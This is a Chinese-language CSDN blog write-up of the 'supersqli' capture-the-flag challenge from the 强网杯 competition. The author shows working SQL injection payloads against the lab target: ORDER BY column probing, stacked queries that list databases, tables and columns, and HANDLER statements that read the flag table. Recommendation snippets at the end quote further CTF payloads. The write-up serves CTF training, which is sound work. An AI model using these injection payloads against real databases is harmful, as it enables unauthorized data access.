攻防世界superspl[强网杯]WP

最新推荐文章于 2024-03-09 20:53:50 发布
最新推荐文章于 2024-03-09 20:53:50 发布
阅读量279 收藏
点赞数 1
文章标签: sql java 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73718199/article/details/127821930
版权

点进来发现

接着查询1和2,正常回显,3不回显

查询1' and 1=1 ,出现SQL报错,说明存在SQL注入

 然后查询字段

1' order by 1 #

1' order by 2 #

查到3的时候出现

说明只有两个字段

查询1' union select 1,database()#

发现这些字符被过滤,试了大小写过滤和其他仍没用,再尝试堆叠注入

查询1'; show databases; #

 这些数据库都出来了,接着1'; use supersqli; show tables;# 查询supersql这个可疑的库

 接着看那一串数字

 -1';use supersqli;show columns from `1919810931114514`;#                   

当纯数字字符串是表名的时候需要加反引号` 

接着使用handler查询

-1';use supersqli;handler `1919810931114514` open as p;handler p read first;#

找到flag.

handler查询法【MySQL】MySQL 之 handler 的详细使用及说明_边扯边淡的博客-CSDN博客_handler mysql

*,1
关注
第四届“强网杯”全国网络安全挑战赛_部分WP
Lemon's blog
08-25 3228
前言: 全靠大佬带飞,自己菜的一批,还需继续努力!,记录一下
攻防世界RE 流浪者 wp
03-15
攻防世界RE 流浪者 wp
强网杯wp
Sentiment的博客
07-22 1062
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网杯wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
第二届强网杯wp
03-29 264
web web签到 利用了md5碰撞 payload为 param1 =%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%6...
2022强网杯WP
CK_0ff的博客
08-08 2881
2022强网杯WP
2023年第七届强网杯初赛 WP
渗透测试研究中心
12-22 3307
最坏情况下,前5次全输,需要87步即可达到260分,即第92轮时,因此可以通过本题。利用SQL注入修改data数据的值,本题data是数组,且会插入数据库,最终的payload需要改一下让前后闭合,且TP5,在网上找一个链子的EXP改一下。当然,前一题的SQL注入点依然存在,不过依然需要鉴权进入后台,这意味着,只需要我们能进入后台,就能通过load_file的方式读取flag。简单来说,就是能set任意的值,例如下方的payload,就能注入一个snowwolf的键,且值为wolf,4代表数据长度。
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
2023年第七届强网杯部分WP
qq_65165505的博客
12-18 2967
在这个网站直接记载了2的27次方的阶乘的每一位数字之和对4495662081取个sha256即可。
2022第六届强网杯部分wp
mxx307的博客
08-01 3121
2022第六届强网杯部分wp
2021强网杯 Web赌徒 WP
E1even的博客
06-15 532
文章目录源代码:分析__invoke__get_tostringEXP调用流程:总结 源代码: <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='syst3m("cat 127.0.0.1/etc/hint");'; public function __construc
第七届强网杯wp
最新发布
m0_73373164的博客
03-09 432
通过nc连接的满足为全部都是1后就能得到flag首先一个一个试拿0试然后到Z可以试出必须为9位并且前面两位是什么都行exp。
广东省第四届“强网杯”网络安全大赛(“泄露的秘密WP”)
weixin_46245411的博客
10-14 5282
感觉应该就算交了WP也进不了决赛~~ 我直接把WP放这里 “泄露的秘密”: 发现存在大量“HTTP”包。 下一步跟踪HTTP流后, 发现存在SQL注入攻击。 使用python脚本获取传递的参数信息:(附上脚本) import pyshark import urllib import re file=pyshark.FileCapture('log.pcapng',display_filter="http") ...
强网杯2021 qwb misc WP 5题
mumuzi的博客
06-16 2883
BlueTeaming、ISO1995、CipherMan、ExtremelySlow、EzTime 本来是说昨天发的,忘了…… 然后取证题,比较偏向爆破出的flag;如果是想知道原理等可以去看看空白师傅的WP:https://mp.weixin.qq.com/s/ItaIgLxcXCjvAhyyP3On9Q BlueTeaming 下载解压,得到一个无后缀,winhex查看是7z文件头,添加.7z,解压 得到一个5个G的memory.dmp文件 是一个内存镜像,常见的内存镜像文件有raw、vmem、dmp
2022强网杯pwn部分wp
N1rvana的博客
08-02 1558
2022强网杯pwn
[强网杯2022]WP-UM
Landasika的博客
08-02 652
考点WordPressUserMetaLitePro2.4.3Path遍历漏洞CVE-2022-0779。
2021年强网杯 逆向部分WP
VRMEI的博客
06-20 850
今年的逆向很???? ezmath 一道数学题,关键在于函数式的缩放化简。 第15行的公式是整个程序的关键 f(n) = e - nf(n) 是一个调和级数的缩放题目 最后当n较大时易知:n = e / f(n) 脚本: #include<stdio.h> #include<math.h> doubledbl_4020[19] = { 0.00009794904266317233, 0.00010270456917442, 0.0...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值